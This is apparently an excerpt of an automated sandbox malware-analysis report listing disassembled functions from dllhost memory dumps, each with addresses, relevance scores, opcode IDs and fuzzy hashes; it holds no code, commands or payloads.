Function 00007FFD9BAE20C9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9BAE20E6

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: fa92e7fdb5960d4ce912bf27ccaa558049c1374ab65a53a9389839d779c47e61
Instruction ID: d847278311ac6b55d43ad3dceaecaa2aae25a679324a48d0ac4403402d7abdf9
Opcode Fuzzy Hash: fa92e7fdb5960d4ce912bf27ccaa558049c1374ab65a53a9389839d779c47e61
Instruction Fuzzy Hash: 3DE0927160E3C44FCB16EA348868455BF60EF6721174A41FFC046CF2A7EA2DC885C702

Function 00007FFD9BAEAE99 Relevance: 1.3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9BAEAEB6

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 0a9dd156eecf72af7a9cd16c811bf7d1dde3cbc50340ea33d0bb3f89e9403431
Instruction ID: 3276e08f25807a97b74ef6c3d61bb71d714b2bc34f87fad7ec6d2bfdfe81b128
Opcode Fuzzy Hash: 0a9dd156eecf72af7a9cd16c811bf7d1dde3cbc50340ea33d0bb3f89e9403431
Instruction Fuzzy Hash: 36E04F7194A7C44FCB16EB7484AA8553FA0DE6721078B40EEC545CF1B3E62D8849C701

Function 00007FFD9BAE86F9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9BAE8716

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 91de29063f1aa8dc52c48ff4caf55f7eca5be1c13e96bf99d06e98a73892c095
Instruction ID: fe878b7a60ecc1febe06ee879ef327eaf7921f95cbb9dffcf20019753fe82dfd
Opcode Fuzzy Hash: 91de29063f1aa8dc52c48ff4caf55f7eca5be1c13e96bf99d06e98a73892c095
Instruction Fuzzy Hash: B1E01A6154F3C44FCB16EB7488A98457FA09E6721078A40EEC145CF1B7E62D8849C701

Function 00007FFD9BAE2159 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9BAE2176

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 4b30783aaca1b5e517c2d333088832db9f67ca1709af667f80765a9635ce9bc0
Instruction ID: 094b3cd1c253802985ce8d4b7b5d0e7dfb06f08cb8c6af458f28737b16b483d1
Opcode Fuzzy Hash: 4b30783aaca1b5e517c2d333088832db9f67ca1709af667f80765a9635ce9bc0
Instruction Fuzzy Hash: 5EE01A6154E3C08FCB0AEB7888699457F60AE6721178B41EEC08ACF1B3E62D8949C711

Function 00007FFD9BAD9A49 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9BAD9A66

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAD3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bad3000_dllhost.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 7db00f5ae26aa7976d9af7f79c90981069e9fcb9f43661c7a0c69122905aa749
Instruction ID: 80e84711b1558c722c3202b132d1c7afcecf2c9a8feaaf0675169ebbed73ae91
Opcode Fuzzy Hash: 7db00f5ae26aa7976d9af7f79c90981069e9fcb9f43661c7a0c69122905aa749
Instruction Fuzzy Hash: 8EE01A7164F7C44FCB5AEB74886A9447FA0AE6721178B41EEC085CF1B3E62D8949C701

Function 00007FFD9BAD9899 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9BAD98B6

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAD3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bad3000_dllhost.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 77c651f864c58c844e0dbb965f48262b852d7407f11c2742787d566ab9fe5095
Instruction ID: 17745f97f8fe8f9ccfb9d27118ade288a009ef986a54285a74a5a29496871800
Opcode Fuzzy Hash: 77c651f864c58c844e0dbb965f48262b852d7407f11c2742787d566ab9fe5095
Instruction Fuzzy Hash: 29E01A6154E3C44FCB1AEB7488658853F609E6721078B40EEC145CF1B7E62DC949C701

Function 00007FFD9BAD9A81 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAD3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bad3000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9232ad85c7641e58cbbcb1bf3c63cb56459c1baea2aaf544f4b91568bb31b9a
Instruction ID: 8f3ac31eb1fdcb68a8a705b26ab15b8a0c0911656d785d1f3a4de58b2174f4d2
Opcode Fuzzy Hash: d9232ad85c7641e58cbbcb1bf3c63cb56459c1baea2aaf544f4b91568bb31b9a
Instruction Fuzzy Hash: 19A1B231B1891D4FDB58EB68C4A8AA977E1FF98314B514679E05EC72E6CF34E842CB40

Function 00007FFD9BAE383D Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c36774078b8a978f6b78e4ad0f0393085a09d80efd98fcf18cdd420f9ecca547
Instruction ID: 0b1338d403b8dfca0dd1bf46e4b8b78e32a42e5ee46067857eaad1d1cd9a5be3
Opcode Fuzzy Hash: c36774078b8a978f6b78e4ad0f0393085a09d80efd98fcf18cdd420f9ecca547
Instruction Fuzzy Hash: FB913821B1DA4E0FEBACEB5884767B973C2EF98350F0542B9D44DC72D7DE68A9458340

Function 00007FFD9BAE47DD Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a3ab124fde22d4169855b36bd9cf481feb2c1e8bf1722f6236bae2985ad25d8
Instruction ID: d609436d4f0b43c39f69fc775353b32345a8d12490af3024262b906385094c7d
Opcode Fuzzy Hash: 1a3ab124fde22d4169855b36bd9cf481feb2c1e8bf1722f6236bae2985ad25d8
Instruction Fuzzy Hash: C981D031E0DA2D8FEB68DF5898567B973E4EB58710F1104B9D44D932A2CE74BE818BC1

Function 00007FFD9BAE27BE Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcf6cdbb602d817097cc71a87b195c2f26ba81bf61bf423c236dfcef1c149169
Instruction ID: ea68420e70d977ff888e5e6d60d32916ac751fabdda8304acb62892f930af86b
Opcode Fuzzy Hash: bcf6cdbb602d817097cc71a87b195c2f26ba81bf61bf423c236dfcef1c149169
Instruction Fuzzy Hash: 1041B831B0DA1D4FEB68DBC8D4A57F873D1EB98320F01417AD00ED72E2DEA869418780

Function 00007FFD9BAB08D0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bab0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5aea0637bc441c6e2da446c0d8329d4f727491f8cdabf963fea71d10031ed5f5
Instruction ID: cccc5ff61e83f2cc98a34f92611fd7938cf049fad7d7d26412a0e5f13f9656be
Opcode Fuzzy Hash: 5aea0637bc441c6e2da446c0d8329d4f727491f8cdabf963fea71d10031ed5f5
Instruction Fuzzy Hash: EA411822B0C5790EE368F7AC64A56FD7781DF9933AF0405BBE45ECB1DBCD18A8418284

Function 00007FFD9BAB11A1 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bab0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0b2c690006da6eab78459d7abc36fa4f995d214f316f9ca99953fb7d420ddde
Instruction ID: b3f37bb65d37fb5d5416248bfc12611d00b809c958402a7c2e272bccb014ed0a
Opcode Fuzzy Hash: a0b2c690006da6eab78459d7abc36fa4f995d214f316f9ca99953fb7d420ddde
Instruction Fuzzy Hash: 27319430A1E69E8FDB55EB68C8649A87BF0EF66300F0505BBC059C71F3DE68A941CB50

Function 00007FFD9BAB0998 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bab0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 744a1e4cb2b26e6d19ea1f165ec75d349aa5a00ac6f35556b8614df4389b3e3b
Instruction ID: f3af164eebbbe281773c3ebfe16f80466b299372f05697280860e24b08acf09e
Opcode Fuzzy Hash: 744a1e4cb2b26e6d19ea1f165ec75d349aa5a00ac6f35556b8614df4389b3e3b
Instruction Fuzzy Hash: 3A212520B1892D0FE7ACE76C946A67972D2EB98325F4101BAE40DC32E7DC64AC024681

Function 00007FFD9BAEB260 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9f019aa27e24137c8a1ccbdb1b5b10e331a66e061196edc893d8a576271f82b
Instruction ID: 95e5f1290c432f2a307bdf973c6600c3a730bebe7d504bc279966895bb8c15ad
Opcode Fuzzy Hash: f9f019aa27e24137c8a1ccbdb1b5b10e331a66e061196edc893d8a576271f82b
Instruction Fuzzy Hash: F131A420A0E3CE4FD7239BB488681E97FB0EF53210F0A41EBD494CB1A3D9A81649C752

Function 00007FFD9BAB0C25 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bab0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98c810d94f2d1daa00b9351318e7d9d3640310bc6b6ae1acffc304475c61d17e
Instruction ID: dde179981291c2f8fcfc9295d2373d0893041b386c80fee673b3926ed304a105
Opcode Fuzzy Hash: 98c810d94f2d1daa00b9351318e7d9d3640310bc6b6ae1acffc304475c61d17e
Instruction Fuzzy Hash: 77315A31B0D25D8FE332EBA988652EC7B60EF52325F0581F7D0288B1D3DA782645CB84

Function 00007FFD9BAE9B44 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66bb9c75f65759c4cff3259defaaed4831b1d033771a91899bbed33bb0f40b7b
Instruction ID: 0da248b2f93a381fabb36f5e599f40a7af664fb34d1d70e6462ce61ebdcf2f07
Opcode Fuzzy Hash: 66bb9c75f65759c4cff3259defaaed4831b1d033771a91899bbed33bb0f40b7b
Instruction Fuzzy Hash: CE215E30A1964D8FEBA8DB58C8A96ECB3F1FF58310F5141B9D009D32E2DE746A848B01

Function 00007FFD9BAE299B Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f47779f31d6cc961e924fbef1623338a48ff147d0b8967e9cf6b467d21f6f00e
Instruction ID: 7527f1d7e944bbe38d1fe98a3d957e7801197f249384c031f8cc0ee9db60c1cd
Opcode Fuzzy Hash: f47779f31d6cc961e924fbef1623338a48ff147d0b8967e9cf6b467d21f6f00e
Instruction Fuzzy Hash: D611A531B0DB5D4FEB78EB9888A1AB8B392EB98310F050279D00DC7297CE646D458B81

Function 00007FFD9BAD6EE1 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAD3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bad3000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ef2339b56463ab43407bf9661a40446f0d7d9882e9f9b293a51f6ce5eda2d9b
Instruction ID: 9471484c96ad37131d762b009075a99bde0e3b3aad565894cd1cf79fb2d7ac2f
Opcode Fuzzy Hash: 2ef2339b56463ab43407bf9661a40446f0d7d9882e9f9b293a51f6ce5eda2d9b
Instruction Fuzzy Hash: 4F01D622B0FA4A0FE361939D98A02B43B91EBE9360F4643B3D049C71A2EC5D99864381

Function 00007FFD9BAE47B0 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 914b1eb8b66fc40524bfda1645302aecd4e3d43dacf6b8fae016d4ac6c2da555
Instruction ID: 36063a3b42bf68f485f1323dcde1a452b384498ae52fd285ae088ee31f1b4328
Opcode Fuzzy Hash: 914b1eb8b66fc40524bfda1645302aecd4e3d43dacf6b8fae016d4ac6c2da555
Instruction Fuzzy Hash: 03115E30E1992A8FEB68DF58946167D77E1EB98B01F11447DE44ED32A2CE74A9418BC0

Function 00007FFD9BAE4EC1 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db0a7003df983b451cdf882bc76feb6c6af5ad543295710f664e07f818eeeb00
Instruction ID: c90d656cac3e669280efa69bfc9eaddb3884ddaf3cafe075d1e6128fa6547e6a
Opcode Fuzzy Hash: db0a7003df983b451cdf882bc76feb6c6af5ad543295710f664e07f818eeeb00
Instruction Fuzzy Hash: 2411C230E0D91A8FEB68DB58946567937E1EB94B14F2144BED04EC72A2CE749D468780

Function 00007FFD9BAB0C38 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bab0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eea93e84d60fef8a6471b174b2bc24e6b883aeea52c0e8c4e5cadf5acf51056c
Instruction ID: e6cc52103f3fcc46451140b0274cda5c6eedec88cbdb288fe29f0a3a54887733
Opcode Fuzzy Hash: eea93e84d60fef8a6471b174b2bc24e6b883aeea52c0e8c4e5cadf5acf51056c
Instruction Fuzzy Hash: E7112531B0D25C8FE722EBA888601EC7FB0EF52310F0640B3C054DB2A2EA7456058B80

Function 00007FFD9BAE7398 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7f582d195ef438eb9afa0faf1cc48ddbcfaddffe977f4df7ab7951db4fb2bf5
Instruction ID: 6d3eaa19926772b777c40cebc88b1f3094c7a0f23601a5063457825d81e7a6ea
Opcode Fuzzy Hash: b7f582d195ef438eb9afa0faf1cc48ddbcfaddffe977f4df7ab7951db4fb2bf5
Instruction Fuzzy Hash: 6C01F216B091524AE319F27CA8B58E87790DF5523F70886B3E19D8D0E7E809A885C685

Function 00007FFD9BAED70E Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e59abe1dfb1dfd2cb95595e43a7c3b465ea35bb5227b68eb62a6731979e07f3
Instruction ID: d66fe4c84c216a67e10bd756f6ad5946134f8cb37668faa7c422a43ad72f1c25
Opcode Fuzzy Hash: 7e59abe1dfb1dfd2cb95595e43a7c3b465ea35bb5227b68eb62a6731979e07f3
Instruction Fuzzy Hash: 5C01B132F094194BEB65D78898943FC73E2EF88321F160176D05DE3191DEB8AE41C780

Function 00007FFD9BAB0C40 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bab0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef131cb522a5a37f39e31dc9e769a1449aa4da52ae05c791b4ea1e719949e20e
Instruction ID: d164d74f3963f671a9d399346b4e7a96b5cc4e9f08b7ed05a62762d34d9ca2da
Opcode Fuzzy Hash: ef131cb522a5a37f39e31dc9e769a1449aa4da52ae05c791b4ea1e719949e20e
Instruction Fuzzy Hash: D401D631A0D29C8FE722DBA8C8601DD7FB0EF52310F1541F7D054DB2A2DA7456458B80

Function 00007FFD9BAEB17A Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3735ae0e0034453a2c9254f3279fec231b0e00db0073cb8e06c21fda61f9a991
Instruction ID: f20144941c80a37b2420cd30a531b2de7ce8b4d198ed056ded2fc83adf586a04
Opcode Fuzzy Hash: 3735ae0e0034453a2c9254f3279fec231b0e00db0073cb8e06c21fda61f9a991
Instruction Fuzzy Hash: 35F0CD22B0A91D4FEB94EB9CA4EA7F8B3D1FB98320F810177E00CC31A3CE6468814341

Function 00007FFD9BAB0C48 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bab0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bef31c10d4458536d21acf654e4190cda8b47d0bef1a805d7ed44298c28e51f0
Instruction ID: 20802f59bde97c301dd5e9b345a6f363c5aac8770f02b3ef939c2b8106521135
Opcode Fuzzy Hash: bef31c10d4458536d21acf654e4190cda8b47d0bef1a805d7ed44298c28e51f0
Instruction Fuzzy Hash: 1801B131A0E28C8FE722EBA8C8601DC7FB0EF56310F1541E7D054DB2A2EA746644CB80

Function 00007FFD9BAE284E Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fc3bbad1e88ac57306564e48c8f62ebae74c3b17e030de6cdaf6c87640c24ce
Instruction ID: f64a20e6c01fb55f937bc27c984c780527534c43b5e52c14a0fc6938a9619657
Opcode Fuzzy Hash: 8fc3bbad1e88ac57306564e48c8f62ebae74c3b17e030de6cdaf6c87640c24ce
Instruction Fuzzy Hash: 2FF06831F0D91D8FEB69EB84C4647A87392EFD8320F054276D419D72D5DD68AD818781

Function 00007FFD9BAB6355 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bab0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 618d79b77454fba6ba741d24d69db522f97f4eb59e0fe1bee1caac15306bcdc8
Instruction ID: ae88d39ec218c27af36ea6f767b4b13e1f0f6ff8bab3403f55c3cd63e3e7722f
Opcode Fuzzy Hash: 618d79b77454fba6ba741d24d69db522f97f4eb59e0fe1bee1caac15306bcdc8
Instruction Fuzzy Hash: 13F0E131648A188FCF98DF48C499EE973B1FBA8301F114199D44AD72A1DA74EAC4CF41

Function 00007FFD9BAB0B77 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bab0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88a61abf18ef1c1919838c8767c2072e8d82e8c37b56fa1fe068a0f146d247f6
Instruction ID: d418cbdb07abc47635a8f2156b71ccc6ed6e5a661542e719f7b0d209bb921151
Opcode Fuzzy Hash: 88a61abf18ef1c1919838c8767c2072e8d82e8c37b56fa1fe068a0f146d247f6
Instruction Fuzzy Hash: E5F0E53525D659CFC781DB7CC8A44C5BBA0FF07224B4505EED089CB5A2D321686DCB41

Function 00007FFD9BAEAE09 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 979a6ce6d6cb1f59308647d420a7491f5188ecb2df365e03cdd1517d15c5cf8f
Instruction ID: 91170a82fcc3a9e5c9d2d4dd727839f183b9de6cb624cf808e25fbaa1fcb404c
Opcode Fuzzy Hash: 979a6ce6d6cb1f59308647d420a7491f5188ecb2df365e03cdd1517d15c5cf8f
Instruction Fuzzy Hash: 76F0E521B1CBC80FC72A562958A50617FE1CB5B10134A01FFC496CB2A3ED58AC868741

Function 00007FFD9BAC4625 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bac0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb1134c2518c86f227eb47f37b2ccd3c8c8531cfea2746c7a3a0895b29fa626d
Instruction ID: 2a6b8866035d4a637104b3d3be56cbbb986dc2d71e6d7a011f4e1789a141e79d
Opcode Fuzzy Hash: cb1134c2518c86f227eb47f37b2ccd3c8c8531cfea2746c7a3a0895b29fa626d
Instruction Fuzzy Hash: D7F0C971A0551A8BEB58AB84C869AFD77A1FB54315F00063ED416A73B9DFB86A008A84

Function 00007FFD9BAE7E69 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c41d9c9d6cf136a57e9a3064b594dcbfd8f5cf898970cac15edfae06ea7e40dd
Instruction ID: 17704cf8083a5fc01e2f9c610c86f28b0cd87ef17d22178b0884332428152b24
Opcode Fuzzy Hash: c41d9c9d6cf136a57e9a3064b594dcbfd8f5cf898970cac15edfae06ea7e40dd
Instruction Fuzzy Hash: B7E04F2194F7C04FCB4B9B3588A88447F71EE2721074A51EAC045CF5B3EA1D9C4AC712

Function 00007FFD9BAE7EB5 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae81d5ac95bd8c5fff8a6cd2c358f58440a4ece3e35b295da8582a4b7a9ac074
Instruction ID: bc609456c48afe17a99a836dbd44cd4213e808e441cb26f9586ea2d6b2dcb0ae
Opcode Fuzzy Hash: ae81d5ac95bd8c5fff8a6cd2c358f58440a4ece3e35b295da8582a4b7a9ac074
Instruction Fuzzy Hash: C3E0C222B0BA490FD71D57388C7D8603BA0DF6621274A00A6D089CB1B2D955DD498302

Function 00007FFD9BAEA9F0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFD9BAEA960 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
